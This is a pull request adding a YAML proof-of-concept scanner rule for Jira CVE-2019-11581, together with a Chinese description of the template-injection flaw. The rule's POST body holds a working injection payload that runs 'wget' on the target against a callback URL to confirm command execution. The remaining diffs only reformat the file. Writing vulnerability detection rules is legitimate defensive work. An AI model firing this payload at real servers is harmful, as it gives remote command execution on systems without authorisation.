### PR TITLE
Create Jira-cve-2019-11581.yml

### DIFF
--- a/pocs/Jira-cve-2019-11581.yml
+++ b/pocs/Jira-cve-2019-11581.yml
@@ -1,0 +1,25 @@
+name: poc-yaml-Jira-cve-2019-11581
+set:
+    r1: randomLowercase(4)
+    reverse: newReverse()
+    reverseUrl: reverse.url
+rules:
+  - method: GET
+    path: /secure/ContactAdministrators!default.jspa
+    follow_redirects: false
+    expression: |
+      response.status == 200
+    search: name="atlassian-token" content="(?P<token>.+?)"
+  - method: POST
+    path: /secure/ContactAdministrators.jspa
+    body: >-
+      from=admin%40{{r1}}.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
+    follow_redirects: false
+    expression: |
+      response.status == 302 && reverse.wait(5)
+
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "cve-2019-11581"
+  links:
+    - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-Jira-cve-2019-11581
+name: poc-yaml-jira-cve-2019-11581
 set:
     r1: randomLowercase(4)
     reverse: newReverse()

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -17,7 +17,7 @@ rules:
     expression: |
       response.status==302 && reverse.wait(5)
 detail:
-  author: harris2015(https://github.com/harris2015)
-  Affected Version: "cve-2019-11581"
-  links:
-    - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
+    author: harris2015(https://github.com/harris2015)
+    Affected Version: "cve-2019-11581"
+    links:
+      - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -3,21 +3,21 @@ set:
     reverse: newReverse()
     reverseUrl: reverse.url
 rules:
-  - method: GET
-    path: /secure/ContactAdministrators!default.jspa
-    follow_redirects: false
-    expression: |
-      response.status==200
-    search: name="atlassian-token" content="(?P<token>.+?)"
-  - method: POST
-    path: /secure/ContactAdministrators.jspa
-    body: >-
-      from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
-    follow_redirects: false
-    expression: |
-      response.status==302 && reverse.wait(5)
+    - method: GET
+      path: /secure/ContactAdministrators!default.jspa
+      follow_redirects: false
+      expression: |
+        response.status==200
+      search: name="atlassian-token" content="(?P<token>.+?)"
+    - method: POST
+      path: /secure/ContactAdministrators.jspa
+      body: >-
+        from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
+      follow_redirects: false
+      expression: |
+        response.status==302 && reverse.wait(5)
 detail:
     author: harris2015(https://github.com/harris2015)
     Affected Version: "cve-2019-11581"
     links:
-      - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
+        - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -7,7 +7,7 @@ rules:
       path: /secure/ContactAdministrators!default.jspa
       follow_redirects: false
       expression: |
-        response.status==200
+        response.status == 200
       search: name="atlassian-token" content="(?P<token>.+?)"
     - method: POST
       path: /secure/ContactAdministrators.jspa
@@ -15,7 +15,7 @@ rules:
         from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
       follow_redirects: false
       expression: |
-        response.status==302 && reverse.wait(5)
+        response.status == 302 && reverse.wait(5)
 detail:
     author: harris2015(https://github.com/harris2015)
     Affected Version: "cve-2019-11581"

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -1,6 +1,5 @@
 name: poc-yaml-jira-cve-2019-11581
 set:
-    r1: randomLowercase(4)
     reverse: newReverse()
     reverseUrl: reverse.url
 rules:
@@ -13,7 +12,7 @@ rules:
   - method: POST
     path: /secure/ContactAdministrators.jspa
     body: >-
-      from=admin%40{{r1}}.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
+      from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
     follow_redirects: false
     expression: |
       response.status == 302 && reverse.wait(5)

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -7,7 +7,7 @@ rules:
     path: /secure/ContactAdministrators!default.jspa
     follow_redirects: false
     expression: |
-      response.status == 200
+      response.status==200
     search: name="atlassian-token" content="(?P<token>.+?)"
   - method: POST
     path: /secure/ContactAdministrators.jspa
@@ -15,7 +15,7 @@ rules:
       from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
     follow_redirects: false
     expression: |
-      response.status == 302 && reverse.wait(5)
+      response.status==302 && reverse.wait(5)
 
 detail:
   author: harris2015(https://github.com/harris2015)

--- a/pocs/jira-cve-2019-11581.yml
+++ b/pocs/jira-cve-2019-11581.yml
@@ -16,7 +16,6 @@ rules:
     follow_redirects: false
     expression: |
       response.status==302 && reverse.wait(5)
-
 detail:
   author: harris2015(https://github.com/harris2015)
   Affected Version: "cve-2019-11581"


### PR DESCRIPTION

----------

## 本 poc 是检测什么漏洞的

Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。

Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞，成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令，从而获取服务器权限，严重危害网络资产。

cve编号：cve-2019-11581

## 测试环境

本地搭建

## 备注

https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html